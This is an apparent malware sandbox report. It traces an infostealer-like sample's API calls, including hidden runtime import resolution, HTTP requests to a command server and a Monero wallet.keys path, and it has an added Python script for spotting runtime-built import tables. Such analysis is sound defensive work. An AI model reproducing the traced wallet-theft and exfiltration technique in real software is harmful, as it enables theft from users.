                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: bceb99ecad4b62e6b866a095f2d965c8213045ce6bb15e8835b8dafba12844b5
                            • Instruction ID: ee8341127802317c1fccb88007a6635000ad71182f1eb2970381b48bbc55ba71
                            • Opcode Fuzzy Hash: bceb99ecad4b62e6b866a095f2d965c8213045ce6bb15e8835b8dafba12844b5
                            • Instruction Fuzzy Hash: 85F04FB1944209EFC710DF98DD49BAEFBB8EB05711F10021AFA15A2680C7B569008BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 2afcd2257abbd5e47389b15ae29bdd827ad99c26a3bae43792dd324b43ca7e77
                            • Instruction ID: 58af55ddd074806e671dbb1ab950e35be5bed9a8dbafb368c800e73f207e62f6
                            • Opcode Fuzzy Hash: 2afcd2257abbd5e47389b15ae29bdd827ad99c26a3bae43792dd324b43ca7e77
                            • Instruction Fuzzy Hash: 80D05E7490030C9BCB10EFE0A84D6DDBB79BB0C225F000654D90562280EA306445CB65

                            Control-flow Graph (legend in the rendered graph: Executed / Not Executed; listed here as basic block, its API calls and its successor blocks)

                            • 633 f49f20-f49f2a -> 634, 635
                            • 634 f4a346-f4a3da: LoadLibraryA * 8 -> 636, 637
                            • 635 f49f30-f4a341: GetProcAddress * 43 -> 634
                            • 636 f4a456-f4a45d -> 638, 639
                            • 637 f4a3dc-f4a451: GetProcAddress * 5 -> 636
                            • 638 f4a526-f4a52d -> 640, 641
                            • 639 f4a463-f4a521: GetProcAddress * 8 -> 638
                            • 640 f4a52f-f4a5a3: GetProcAddress * 5 -> 641
                            • 641 f4a5a8-f4a5af -> 642, 643
                            • 642 f4a5b5-f4a642: GetProcAddress * 6 -> 643
                            • 643 f4a647-f4a64e -> 644, 645
                            • 644 f4a654-f4a72a: GetProcAddress * 9 -> 645
                            • 645 f4a72f-f4a736 -> 646, 647
                            • 646 f4a7b2-f4a7b9 -> 648, 649
                            • 647 f4a738-f4a7ad: GetProcAddress * 5 -> 646
                            • 648 f4a7ec-f4a7f3 -> 650, 651
                            • 649 f4a7bb-f4a7e7: GetProcAddress * 2 -> 648
                            • 650 f4a825-f4a82c -> 652, 653
                            • 651 f4a7f5-f4a820: GetProcAddress * 2 -> 650
                            • 652 f4a922-f4a929 -> 654, 655
                            • 653 f4a832-f4a91d: GetProcAddress * 10 -> 652
                            • 654 f4a98d-f4a994 -> 656, 657
                            • 655 f4a92b-f4a988: GetProcAddress * 4 -> 654
                            • 656 f4a996-f4a9a9: GetProcAddress -> 657
                            • 657 f4a9ae-f4a9b5 -> 658, 659
                            • 658 f4a9b7-f4aa13: GetProcAddress * 4 -> 659
                            • 659 f4aa18-f4aa19
                            APIs
                            • GetProcAddress.KERNEL32(75900000,00976940), ref: 00F49F3D
                            • GetProcAddress.KERNEL32(75900000,009766C0), ref: 00F49F55
                            • GetProcAddress.KERNEL32(75900000,00988EF8), ref: 00F49F6E
                            • GetProcAddress.KERNEL32(75900000,00988F10), ref: 00F49F86
                            • GetProcAddress.KERNEL32(75900000,0098CF88), ref: 00F49F9E
                            • GetProcAddress.KERNEL32(75900000,0098CEE0), ref: 00F49FB7
                            • GetProcAddress.KERNEL32(75900000,0097B018), ref: 00F49FCF
                            • GetProcAddress.KERNEL32(75900000,0098CE50), ref: 00F49FE7
                            • GetProcAddress.KERNEL32(75900000,0098CF58), ref: 00F4A000
                            • GetProcAddress.KERNEL32(75900000,0098CE68), ref: 00F4A018
                            • GetProcAddress.KERNEL32(75900000,0098CDF0), ref: 00F4A030
                            • GetProcAddress.KERNEL32(75900000,00976880), ref: 00F4A049
                            • GetProcAddress.KERNEL32(75900000,009768C0), ref: 00F4A061
                            • GetProcAddress.KERNEL32(75900000,00976980), ref: 00F4A079
                            • GetProcAddress.KERNEL32(75900000,00976780), ref: 00F4A092
                            • GetProcAddress.KERNEL32(75900000,0098CEF8), ref: 00F4A0AA
                            • GetProcAddress.KERNEL32(75900000,0098CE80), ref: 00F4A0C2
                            • GetProcAddress.KERNEL32(75900000,0097B158), ref: 00F4A0DB
                            • GetProcAddress.KERNEL32(75900000,00976900), ref: 00F4A0F3
                            • GetProcAddress.KERNEL32(75900000,0098CE08), ref: 00F4A10B
                            • GetProcAddress.KERNEL32(75900000,0098CE20), ref: 00F4A124
                            • GetProcAddress.KERNEL32(75900000,0098CE98), ref: 00F4A13C
                            • GetProcAddress.KERNEL32(75900000,0098CEB0), ref: 00F4A154
                            • GetProcAddress.KERNEL32(75900000,009768A0), ref: 00F4A16D
                            • GetProcAddress.KERNEL32(75900000,0098CE38), ref: 00F4A185
                            • GetProcAddress.KERNEL32(75900000,0098CEC8), ref: 00F4A19D
                            • GetProcAddress.KERNEL32(75900000,0098CF10), ref: 00F4A1B6
                            • GetProcAddress.KERNEL32(75900000,0098CF28), ref: 00F4A1CE
                            • GetProcAddress.KERNEL32(75900000,0098CF40), ref: 00F4A1E6
                            • GetProcAddress.KERNEL32(75900000,0098CF70), ref: 00F4A1FF
                            • GetProcAddress.KERNEL32(75900000,0098CFA0), ref: 00F4A217
                            • GetProcAddress.KERNEL32(75900000,0098C820), ref: 00F4A22F
                            • GetProcAddress.KERNEL32(75900000,0098CA60), ref: 00F4A248
                            • GetProcAddress.KERNEL32(75900000,00989E88), ref: 00F4A260
                            • GetProcAddress.KERNEL32(75900000,0098C838), ref: 00F4A278
                            • GetProcAddress.KERNEL32(75900000,0098C850), ref: 00F4A291
                            • GetProcAddress.KERNEL32(75900000,009768E0), ref: 00F4A2A9
                            • GetProcAddress.KERNEL32(75900000,0098C808), ref: 00F4A2C1
                            • GetProcAddress.KERNEL32(75900000,00976920), ref: 00F4A2DA
                            • GetProcAddress.KERNEL32(75900000,0098C868), ref: 00F4A2F2
                            • GetProcAddress.KERNEL32(75900000,0098C958), ref: 00F4A30A
                            • GetProcAddress.KERNEL32(75900000,009762E0), ref: 00F4A323
                            • GetProcAddress.KERNEL32(75900000,009765A0), ref: 00F4A33B
                            • LoadLibraryA.KERNEL32(0098C880,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A34D
                            • LoadLibraryA.KERNEL32(0098C898,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A35E
                            • LoadLibraryA.KERNEL32(0098CA78,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A370
                            • LoadLibraryA.KERNEL32(0098C8E0,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A382
                            • LoadLibraryA.KERNEL32(0098C928,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A393
                            • LoadLibraryA.KERNEL32(0098CA90,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A3A5
                            • LoadLibraryA.KERNEL32(0098C9A0,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A3B7
                            • LoadLibraryA.KERNEL32(0098CA18,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A3C8
                            • GetProcAddress.KERNEL32(75FD0000,00976420), ref: 00F4A3EA
                            • GetProcAddress.KERNEL32(75FD0000,0098C8F8), ref: 00F4A402
                            • GetProcAddress.KERNEL32(75FD0000,00988AE0), ref: 00F4A41A
                            • GetProcAddress.KERNEL32(75FD0000,0098C940), ref: 00F4A433
                            • GetProcAddress.KERNEL32(75FD0000,009764A0), ref: 00F4A44B
                            • GetProcAddress.KERNEL32(6FEA0000,0097B090), ref: 00F4A470
                            • GetProcAddress.KERNEL32(6FEA0000,009765C0), ref: 00F4A489
                            • GetProcAddress.KERNEL32(6FEA0000,0097B108), ref: 00F4A4A1
                            • GetProcAddress.KERNEL32(6FEA0000,0098CA48), ref: 00F4A4B9
                            • GetProcAddress.KERNEL32(6FEA0000,0098C910), ref: 00F4A4D2
                            • GetProcAddress.KERNEL32(6FEA0000,009763E0), ref: 00F4A4EA
                            • GetProcAddress.KERNEL32(6FEA0000,00976440), ref: 00F4A502
                            • GetProcAddress.KERNEL32(6FEA0000,0098CAA8), ref: 00F4A51B
                            • GetProcAddress.KERNEL32(763B0000,009764E0), ref: 00F4A53C
                            • GetProcAddress.KERNEL32(763B0000,00976500), ref: 00F4A554
                            • GetProcAddress.KERNEL32(763B0000,0098CAC0), ref: 00F4A56D
                            • GetProcAddress.KERNEL32(763B0000,0098C970), ref: 00F4A585
                            • GetProcAddress.KERNEL32(763B0000,00976320), ref: 00F4A59D
                            • GetProcAddress.KERNEL32(750F0000,0097B248), ref: 00F4A5C3
                            • GetProcAddress.KERNEL32(750F0000,0097B2E8), ref: 00F4A5DB
                            • GetProcAddress.KERNEL32(750F0000,0098CA30), ref: 00F4A5F3
                            • GetProcAddress.KERNEL32(750F0000,009765E0), ref: 00F4A60C
                            • GetProcAddress.KERNEL32(750F0000,00976480), ref: 00F4A624
                            • GetProcAddress.KERNEL32(750F0000,0097B0B8), ref: 00F4A63C
                            • GetProcAddress.KERNEL32(75A50000,0098CAD8), ref: 00F4A662
                            • GetProcAddress.KERNEL32(75A50000,00976280), ref: 00F4A67A
                            • GetProcAddress.KERNEL32(75A50000,00988B20), ref: 00F4A692
                            • GetProcAddress.KERNEL32(75A50000,0098C7F0), ref: 00F4A6AB
                            • GetProcAddress.KERNEL32(75A50000,0098C9D0), ref: 00F4A6C3
                            • GetProcAddress.KERNEL32(75A50000,00976400), ref: 00F4A6DB
                            • GetProcAddress.KERNEL32(75A50000,009764C0), ref: 00F4A6F4
                            • GetProcAddress.KERNEL32(75A50000,0098C8B0), ref: 00F4A70C
                            • GetProcAddress.KERNEL32(75A50000,0098C8C8), ref: 00F4A724
                            • GetProcAddress.KERNEL32(75070000,00976560), ref: 00F4A746
                            • GetProcAddress.KERNEL32(75070000,0098C9B8), ref: 00F4A75E
                            • GetProcAddress.KERNEL32(75070000,0098C9E8), ref: 00F4A776
                            • GetProcAddress.KERNEL32(75070000,0098C988), ref: 00F4A78F
                            • GetProcAddress.KERNEL32(75070000,0098CA00), ref: 00F4A7A7
                            • GetProcAddress.KERNEL32(74E50000,00976600), ref: 00F4A7C8
                            • GetProcAddress.KERNEL32(74E50000,00976620), ref: 00F4A7E1
                            • GetProcAddress.KERNEL32(75320000,00976340), ref: 00F4A802
                            • GetProcAddress.KERNEL32(75320000,0098CD18), ref: 00F4A81A
                            • GetProcAddress.KERNEL32(6F060000,00976640), ref: 00F4A840
                            • GetProcAddress.KERNEL32(6F060000,009762A0), ref: 00F4A858
                            • GetProcAddress.KERNEL32(6F060000,00976660), ref: 00F4A870
                            • GetProcAddress.KERNEL32(6F060000,0098CB80), ref: 00F4A889
                            • GetProcAddress.KERNEL32(6F060000,009762C0), ref: 00F4A8A1
                            • GetProcAddress.KERNEL32(6F060000,00976300), ref: 00F4A8B9
                            • GetProcAddress.KERNEL32(6F060000,00976360), ref: 00F4A8D2
                            • GetProcAddress.KERNEL32(6F060000,00976520), ref: 00F4A8EA
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00F4A901
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00F4A917
                            • GetProcAddress.KERNEL32(74E00000,0098CAF0), ref: 00F4A939
                            • GetProcAddress.KERNEL32(74E00000,00988B70), ref: 00F4A951
                            • GetProcAddress.KERNEL32(74E00000,0098CBF8), ref: 00F4A969
                            • GetProcAddress.KERNEL32(74E00000,0098CB98), ref: 00F4A982
                            • GetProcAddress.KERNEL32(74DF0000,00976380), ref: 00F4A9A3
                            • GetProcAddress.KERNEL32(6F9C0000,0098CB08), ref: 00F4A9C4
                            • GetProcAddress.KERNEL32(6F9C0000,00976580), ref: 00F4A9DD
                            • GetProcAddress.KERNEL32(6F9C0000,0098CDD8), ref: 00F4A9F5
                            • GetProcAddress.KERNEL32(6F9C0000,0098CB50), ref: 00F4AA0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: b3254377219022c4925d4fab668e7608de255795673d5bc93372c0f9e9cb46d6
                            • Instruction ID: 8d5909555648a962a838175031760cbc89083ec2a924d9e6e7d2c9260a6b4e42
                            • Opcode Fuzzy Hash: b3254377219022c4925d4fab668e7608de255795673d5bc93372c0f9e9cb46d6
                            • Instruction Fuzzy Hash: 86624DB55102009FC376DFA8F88C956BBBAB74D301710871ABA89C329ED775B951CFA0
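The function above resolves well over a hundred imports through LoadLibraryA/GetProcAddress, and for all but two calls (InternetSetOptionA, HttpQueryInfoA) the sandbox prints the name argument only as an address in the 0098xxxx range, i.e. it was not a printable string at call time. That pattern (a large runtime-built import table from names that are not in the PE string table) is a useful triage signal on its own. The script below is an added example, not Joe Sandbox or Stealc code: it parses API lines in the exact format this report uses, groups GetProcAddress calls by module handle, separates names printed in clear from names printed as addresses, and applies an assumed threshold heuristic. The sample trace is a handful of lines copied from the list above; run it on the whole list to get, for instance, the 43 calls made against handle 75900000.

```python
import re
from collections import Counter

# Constructed sample: a few lines copied from the API list of the function above.
# Most GetProcAddress name arguments appear only as addresses (0098xxxx); two are
# printed in clear by the sandbox.
SAMPLE_TRACE = """\
• GetProcAddress.KERNEL32(75900000,00976940), ref: 00F49F3D
• GetProcAddress.KERNEL32(75900000,009766C0), ref: 00F49F55
• LoadLibraryA.KERNEL32(0098C880,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A34D
• GetProcAddress.KERNEL32(75FD0000,00976420), ref: 00F4A3EA
• GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00F4A901
• GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00F4A917
• GetProcAddress.KERNEL32(6F9C0000,0098CB08), ref: 00F4A9C4
  • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
"""

# One "• Api.MODULE(args), ref: ADDR" line, optionally prefixed with the
# "Part of subcall function XXXX:" marker the report uses for callees.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_trace(text):
    """Turn the report's API lines into dicts; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),
            "subcall_of": m.group("sub"),
        })
    return calls


def summarize_resolution(calls):
    """Group GetProcAddress calls by module handle and separate names the sandbox
    printed as 8-digit addresses from names it printed in clear."""
    per_handle = Counter()
    literal_names = []
    pointer_only = 0
    load_library = 0
    for c in calls:
        if c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            handle, name = c["args"][0], c["args"][1]
            per_handle[handle] += 1
            if HEX8_RE.match(name):
                pointer_only += 1
            else:
                literal_names.append(name)
        elif c["api"] == "LoadLibraryA":
            load_library += 1
    return {
        "total_getprocaddress": sum(per_handle.values()),
        "per_handle": dict(per_handle),
        "pointer_only": pointer_only,
        "literal_names": literal_names,
        "load_library": load_library,
    }


def looks_like_runtime_import_table(summary, min_resolved=20, min_pointer_ratio=0.8):
    """Assumed-threshold heuristic: many GetProcAddress calls whose name argument was
    not a printable string at call time point to an import table built from names
    decoded at runtime rather than from the PE import directory."""
    total = summary["total_getprocaddress"]
    if total < min_resolved:
        return False
    return summary["pointer_only"] / total >= min_pointer_ratio


if __name__ == "__main__":
    s = summarize_resolution(parse_trace(SAMPLE_TRACE))
    for handle, n in sorted(s["per_handle"].items(), key=lambda kv: -kv[1]):
        print(f"module handle {handle}: {n} GetProcAddress call(s)")
    print("names in clear:", s["literal_names"])
    print("runtime import table?", looks_like_runtime_import_table(s, min_resolved=5, min_pointer_ratio=0.6))
```

The module handles are kept as opaque strings on purpose: the report does not say which DLL each base address belongs to, so the script only counts per handle and leaves the mapping to the analyst (the handle that receives the two WinINet names in clear is the obvious candidate for wininet.dll).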

                            Control-flow Graph (legend in the rendered graph: Executed / Not Executed; listed here as basic block, its API calls and its successor blocks)

                            • 801 f348d0-f34992: call f4aab0 call f34800 call f4aa50 * 5 InternetOpenA StrCmpCA -> 816, 817
                            • 816 f34994 -> 817
                            • 817 f3499b-f3499f -> 818, 819
                            • 818 f349a5-f34b1d: call f48cf0 call f4ac30 call f4abb0 call f4ab10 * 2 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4ac30 call f4abb0 call f4ab10 * 2 InternetConnectA -> 819, 905
                            • 819 f34f1b-f34f43: InternetCloseHandle call f4ade0 call f3a210 -> 829, 830
                            • 829 f34f82-f34ff2: call f48b20 * 2 call f4aab0 call f4ab10 * 8
                            • 830 f34f45-f34f7d: call f4ab30 call f4acc0 call f4abb0 call f4ab10 -> 829
                            • 905 f34b23-f34b27 -> 906, 907
                            • 906 f34b35 -> 908
                            • 907 f34b29-f34b33 -> 908
                            • 908 f34b3f-f34b72: HttpOpenRequestA -> 909, 910
                            • 909 f34b78-f34e78: call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4acc0 call f4abb0 call f4ab10 call f4ac30 call f4abb0 call f4ab10 call f4aa50 call f4ac30 * 2 call f4abb0 call f4ab10 * 2 call f4ade0 lstrlen call f4ade0 * 2 lstrlen call f4ade0 HttpSendRequestA -> 1021
                            • 910 f34f0e-f34f15: InternetCloseHandle -> 819
                            • 1021 f34e82-f34eac: InternetReadFile -> 1022, 1023
                            • 1022 f34eb7-f34f09: InternetCloseHandle call f4ab10 -> 910
                            • 1023 f34eae-f34eb5 -> 1022, 1024
                            • 1024 f34eb9-f34ef7: call f4acc0 call f4abb0 call f4ab10 -> 1021
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                              • Part of subcall function 00F34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F34965
                            • StrCmpCA.SHLWAPI(?,0098E540), ref: 00F3498A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F34B0A
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F50DDE,00000000,?,?,00000000,?,",00000000,?,0098E5A0), ref: 00F34E38
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F34E54
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F34E68
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F34E99
                            • InternetCloseHandle.WININET(00000000), ref: 00F34EFD
                            • InternetCloseHandle.WININET(00000000), ref: 00F34F15
                            • HttpOpenRequestA.WININET(00000000,0098E440,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F34B65
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • InternetCloseHandle.WININET(00000000), ref: 00F34F1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 87aa24ca288904ac184a63912f471e83d1da1df2bccb9b0cda36fbe97a7b756f
                            • Instruction ID: b5348ac6cf12372aae3b2cce8d6bcea0fb610308b1ee429d3552ac801c3b285d
                            • Opcode Fuzzy Hash: 87aa24ca288904ac184a63912f471e83d1da1df2bccb9b0cda36fbe97a7b756f
                            • Instruction Fuzzy Hash: 58120C72950518AAEB15EB90DDA2FEEBB39BF54300F004199F50662492DF387F48DF62

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 f45760-f457c7 call f45d20 call f4ab30 * 3 call f4aa50 * 4 1106 f457cc-f457d3 1090->1106 1107 f457d5-f45806 call f4ab30 call f4aab0 call f31590 call f45440 1106->1107 1108 f45827-f4589c call f4aa50 * 2 call f31590 call f45510 call f4abb0 call f4ab10 call f4ade0 StrCmpCA 1106->1108 1123 f4580b-f45822 call f4abb0 call f4ab10 1107->1123 1134 f458e3-f458f9 call f4ade0 StrCmpCA 1108->1134 1138 f4589e-f458de call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1108->1138 1123->1134 1139 f45a2c-f45a94 call f4abb0 call f4ab30 * 2 call f316b0 call f4ab10 * 4 call f31670 call f31550 1134->1139 1140 f458ff-f45906 1134->1140 1138->1134 1269 f45d13-f45d16 1139->1269 1142 f4590c-f45913 1140->1142 1143 f45a2a-f45aaf call f4ade0 StrCmpCA 1140->1143 1146 f45915-f45969 call f4ab30 call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1142->1146 1147 f4596e-f459e3 call f4aa50 * 2 call f31590 call f45510 call f4abb0 call f4ab10 call f4ade0 StrCmpCA 1142->1147 1162 f45ab5-f45abc 1143->1162 1163 f45be1-f45c49 call f4abb0 call f4ab30 * 2 call f316b0 call f4ab10 * 4 call f31670 call f31550 1143->1163 1146->1143 1147->1143 1245 f459e5-f45a25 call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1147->1245 1168 f45ac2-f45ac9 1162->1168 1169 f45bdf-f45c64 call f4ade0 StrCmpCA 1162->1169 1163->1269 1175 f45b23-f45b98 call f4aa50 * 2 call f31590 call f45510 call f4abb0 call f4ab10 call f4ade0 StrCmpCA 1168->1175 1176 f45acb-f45b1e call f4ab30 call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1168->1176 1198 f45c66-f45c71 Sleep 1169->1198 1199 f45c78-f45ce1 call f4abb0 call f4ab30 * 2 call f316b0 call f4ab10 * 4 call f31670 call f31550 1169->1199 1175->1169 1274 f45b9a-f45bda call f4aab0 call f31590 call f45440 call f4abb0 call f4ab10 1175->1274 1176->1169 1198->1106 1199->1269 1245->1143 1274->1169
                            APIs
                              • Part of subcall function 00F4AB30: lstrlen.KERNEL32(00F34F55,?,?,00F34F55,00F50DDF), ref: 00F4AB3B
                              • Part of subcall function 00F4AB30: lstrcpy.KERNEL32(00F50DDF,00000000), ref: 00F4AB95
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F45894
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F458F1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F45AA7
